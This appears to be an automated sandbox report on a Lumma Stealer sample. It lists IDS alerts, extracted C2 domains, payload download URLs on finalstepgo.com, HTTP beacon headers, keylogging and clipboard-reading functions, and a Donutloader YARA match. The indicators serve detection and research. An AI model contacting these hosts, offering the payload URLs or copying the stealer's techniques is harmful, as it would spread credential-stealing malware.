Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.206.221:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abortinoiwiam.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: surroundeocw.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: candleduseiwo.shop
Source: Malware configuration extractor	URLs: racedsuitreow.shop

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.255.122.133 185.255.122.133
Source: Joe Sandbox View	IP Address: 172.67.206.221 172.67.206.221

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ICMESE ICMESE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com

Source: global traffic	DNS traffic detected: DNS query: finalstepgo.com
Source: global traffic	DNS traffic detected: DNS query: candleduseiwo.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1721693277.0000024B0924D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr	String found in binary or memory: http://www.privacy-drive.comx
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/
Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/a
Source: svchost.exe, 00000003.00000002.2896185836.0000024B04302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895863314.0000024B03A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1825018991.0000024B08F61000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://finalstepgo.com/uploads/il222.zip
Source: svchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/uploads/il222.zipK
Source: svchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zip
Source: svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zipe
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/)e3
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/3
Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/P
Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923428960.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiJV&
Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiU.h
Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiV
Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apie
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apisP
Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop:443/api
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-ma
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.cybertronsoft.com
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/cps0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_00424260

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_00424260

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00422070 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

4_2_00422070

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,		4_2_00FDC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,		8_2_00FCC583

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0045D070: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle,

4_2_0045D070

Contains functionality to delete services

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_0041D0B0

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050E640	4_2_0050E640
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0043D090	4_2_0043D090
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F158	4_2_0050F158
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050715B	4_2_0050715B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004E9350	4_2_004E9350
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004133B0	4_2_004133B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0049B470	4_2_0049B470
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050E674	4_2_0050E674
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0044B630	4_2_0044B630
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0051B680	4_2_0051B680
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0045F770	4_2_0045F770
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004237D0	4_2_004237D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004C3850	4_2_004C3850
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004C28B0	4_2_004C28B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F955	4_2_0050F955
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F974	4_2_0050F974
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0044AB40	4_2_0044AB40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004AEBE0	4_2_004AEBE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040FD70	4_2_0040FD70
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00514E40	4_2_00514E40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00441E60	4_2_00441E60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDC583	4_2_00FDC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8055F	4_2_00F8055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB80E2	4_2_00FB80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F931C2	4_2_00F931C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FCC2B2	4_2_00FCC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F85292	4_2_00F85292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB8372	4_2_00FB8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDD5C4	4_2_00FDD5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FAD652	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB9792	4_2_00FB9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F898B2	4_2_00F898B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8E802	4_2_00F8E802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FAB99B	4_2_00FAB99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8CAE2	4_2_00F8CAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8DA82	4_2_00F8DA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB9A42	4_2_00FB9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F83A08	4_2_00F83A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FA0B95	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82CB5	4_2_00F82CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FBFCA2	4_2_00FBFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FC9DB2	4_2_00FC9DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82D5B	4_2_00F82D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F86EFD	4_2_00F86EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8BEE2	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F86EB2	4_2_00F86EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F88EB2	4_2_00F88EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82E8E	4_2_00F82E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82E1A	4_2_00F82E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82FB3	4_2_00F82FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8CF72	4_2_00F8CF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AB570	4_2_051AB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A15B1	4_2_051A15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A1418	4_2_051A1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A148C	4_2_051A148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A54B0	4_2_051A54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A74B0	4_2_051A74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A54FB	4_2_051A54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AA4E0	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051B17C0	4_2_051B17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D66E0	4_2_051D66E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051BF193	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A2006	4_2_051A2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D8040	4_2_051D8040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AC080	4_2_051AC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AB0E0	4_2_051AB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A1359	4_2_051A1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051E83B0	4_2_051E83B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A12B3	4_2_051A12B3
